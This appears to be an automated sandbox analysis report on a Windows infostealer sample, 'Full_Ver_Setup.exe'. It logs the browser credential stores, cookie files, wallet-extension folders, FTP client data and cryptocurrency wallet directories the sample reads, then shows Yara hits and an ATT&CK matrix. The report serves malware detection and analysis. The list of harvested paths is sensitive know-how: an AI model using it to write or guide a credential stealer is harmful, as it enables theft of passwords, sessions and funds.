              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: Yara matchFile source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              121
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts22
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory121
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell
              Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager121
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture115
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync32
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


